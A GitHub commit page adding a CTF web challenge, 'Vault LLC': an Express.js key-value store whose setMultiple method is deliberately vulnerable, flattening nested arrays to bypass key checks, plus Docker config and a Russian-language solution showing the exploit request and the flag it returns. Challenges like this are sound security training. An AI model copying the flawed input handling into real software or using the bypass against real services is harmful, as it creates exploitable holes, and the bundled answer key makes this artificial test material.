Skip to content

Commit

Permalink
Vault LLC
Browse files Browse the repository at this point in the history
  • Loading branch information
@kabachook
kabachook authored Jun 7, 2019
1 parent fc5e6cb commit ed0b49c
Show file tree
Hide file tree
Showing 469 changed files with 72,761 additions and 0 deletions.
1 change: 1 addition & 0 deletions vault_llc/.dockerignore
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
node_modules
1 change: 1 addition & 0 deletions vault_llc/.env
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
COMPOSE_PROJECT_NAME=vault
14 changes: 14 additions & 0 deletions vault_llc/Dockerfile
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
FROM node:alpine

WORKDIR /usr/src/app

COPY package.json yarn.lock ./

RUN yarn

COPY . .

ENV flag "battles{never_parse_user_input_structures!!!}"

EXPOSE 31337
CMD ["yarn", "start"]
11 changes: 11 additions & 0 deletions vault_llc/README.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
# Vault LLC

## Автор
Данил Бельтюков ([kabachook](https://github.com/kabachook))

## Задание
```
<URL>
```

## [Решение](SOLUTION.md)
34 changes: 34 additions & 0 deletions vault_llc/SOLUTION.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
Флаг лежит в `storage._vault['flag']`,
через `storage.get('flag')` его нельзя достать т.к нельзя прописать себе `level`

Это можно обойти, юзнув `setMultiple` с аргументами `['blabla', ['blabla', 'level', 'spbctf_security_1337']]`

`setMultiple` "раскроет вложенные массивы", которые обойдут проверку ключа

Вложенный массив можно передать, потому что используется body-parser

> GET /setm HTTP/1.1
> Host: localhost:31337
> User-Agent: insomnia/6.4.2
> Content-Type: application/json
> Accept: */*
> Content-Length: 52

| [
| "kek", ["lul", "level", "spbctf_security_1337"]
| ]

----

> GET /get?key=flag HTTP/1.1
< HTTP/1.1 200 OK
< X-Powered-By: Express
< Content-Type: application/json; charset=utf-8
< Content-Length: 45
< ETag: W/"2d-T0uhy/9+2Ry6rEl3D5TELS5q8OQ"
< Date: Thu, 09 May 2019 12:58:42 GMT
< Connection: keep-alive

| {
| "value": "battles{never_parse_user_input_structures!!!}"
| }
10 changes: 10 additions & 0 deletions vault_llc/docker-compose.yml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
version: "3"

services:
vault:
build: .
image: battles/vault
ports:
- 15101:31337
environment:
- flag=battles{never_parse_user_input_structures!!!}
14 changes: 14 additions & 0 deletions vault_llc/index.html
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta http-equiv="X-UA-Compatible" content="ie=edge" />
<title>Vault LLC</title>
</head>
<body>
<h2>Can you break into my vault?</h2>
<h3>Source at <a href="/index.js">/index.js</a></h3>
<!-- <h4>Thx GreenDog for vector</h4> -->
</body>
</html>
122 changes: 122 additions & 0 deletions vault_llc/index.js
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,122 @@
const express = require("express");
const bodyParser = require("body-parser");
const session = require("express-session");

class Storage {
constructor() {
this._vault = {};
}

get(key) {
console.log("get ", key);
if (key === "flag" && this._vault["level"] != "spbctf_security_1337") {
return "nope";
}
return this._vault[key];
}

set(key, value) {
console.log("set ", key, value);
if (key === "level" || key === "flag") {
return "nope";
}
return (this._vault[key] = value);
}

setMultiple(...args) {
console.log("setm ", args);
let key = null,
value = null;
let queue = [];

for (let curr of args) {
if (typeof curr === "object") {
queue.push(...curr);
} else {
if (curr === "level" || curr === "flag") {
return "nope";
}

queue.push(curr);
}
}

if (queue.length % 2 !== 0) return;

for (let i = 0; i < queue.length; i += 2) {
key = queue[i];
value = queue[i + 1];

if (key === "flag") {
return "nope";
}

this._vault[key] = value;
}

return queue;
}
}

const startServer = async port => {
const app = express();
app.use(bodyParser.json({ extended: true }));
app.use(
session({ secret: "battles", resave: false, saveUninitialized: true })
);

let storages = {};

app.use((req, res, next) => {
if (!storages[req.sessionID]) {
storages[req.sessionID] = new Storage();
storages[req.sessionID]._vault["flag"] = process.env["flag"] || "FLAG";
storages[req.sessionID]._vault["level"] = "0";
}

req.storage = storages[req.sessionID];
return next();
});

app.get("/", (req, res) => {
res.sendFile(__dirname + "/index.html");
});

app.get("/index.js", (req, res) => {
res.sendFile(__dirname + "/index.js");
});

app.get("/set", (req, res) => {
const { key, value } = req.query;

if (!key || !value) {
return res.status(400).json({ error: "Not all params" });
}

res.json({
value: req.storage.set(key, value)
});
});

app.get("/setm", (req, res) => {
res.json({
value: req.storage.setMultiple(...req.body)
});
});

app.get("/get", (req, res) => {
const { key } = req.query;

if (!key) {
return res.status(400).json({ error: "Not all params" });
}

res.json({
value: req.storage.get(key)
});
});

app.listen(port, () => console.log(`Started at :${port}`));
};

startServer(31337);
8 changes: 8 additions & 0 deletions vault_llc/node_modules/.bin/mime
View file

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

84 changes: 84 additions & 0 deletions vault_llc/node_modules/.yarn-integrity
View file

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

Loading

0 comments on commit ed0b49c

Please sign in to comment.